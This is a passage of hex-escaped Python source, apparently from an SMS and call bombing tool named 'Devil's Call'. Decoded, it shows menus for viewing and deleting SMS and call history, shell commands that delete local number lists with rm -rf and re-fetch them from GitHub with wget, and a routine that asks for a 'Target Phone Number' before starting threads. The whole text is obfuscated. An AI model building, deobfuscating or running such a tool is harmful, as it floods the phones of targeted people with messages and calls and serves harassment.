2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20
\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x7b\x30\x7d\x5b\x7b\x35\x7d\x33\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x6f\x20\x44\x65\x6c\x65\x74\x65\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x71\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c
\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x32\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x33\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d
\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f
\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x32\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20
\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x53\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x57\x65\x6e\x74\x20\x57\x72\x6f\x6e\x67\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x34\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d
\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x22\x22\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x20\x7b\x30\x7d\x50\x52\x45\x53
\x53\x20\x7b\x36\x7d\x22\x7b\x34\x7d\x7b\x30\x7d\x51\x7b\x36\x7d\x22\x7b\x34\x7d\x20\x7b\x30\x7d\x52\x45\x54\x55\x52\x4e\x20\x54\x4f\x20\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x20\x7b\x35\x7d\x28\x7b\x32\x7d\x57\x69\x74\x68\x6f\x75\x74\x20\x2b\x7b\x35\x7d\x29\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x33\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x27\x2b\x27\x20\x69\x6e\x20\x63\x63\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x20\x3d\x20\x6c\x69\x73\x74\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x2e\x72\x65\x6d\x6f\x76\x65\x28\x27\x2b\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63
\x63\x20\x3d\x20\x27\x27\x2e\x6a\x6f\x69\x6e\x28\x74\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x63\x63\x2e\x73\x74\x72\x69\x70\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3e\x3d\x20\x34\x20\x6f\x72\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3c\x20\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x64\x70\x6e\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x54\x61\x72\x67\x65\x74\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x5c\x74\x5c\x74\x7b\x37\x7d\x7b\x30\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x20\x7b\x36\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x63\x63\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x70\x6e\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x72\x65\x6d\x73\x70\x28\x64\x70\x6e\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x70\x6e\x29\x20\x3c\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30
\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x66\x6f\x72\x20\x63\x63\x68\x20\x69\x6e\x20\x73\x74\x72\x28\x63\x63\x20\x2b\x20\x70\x6e\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6f\x74\x20\x63\x63\x68\x2e\x69\x73\x64\x69\x67\x69\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x4d\x75\x73\x74\x20\x43\x6f\x6e\x73\x69\x73\x74\x20\x4f\x66\x20\x4e\x75\x6d\x62\x65\x72\x73\x20\x4f\x6e\x6c\x79\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d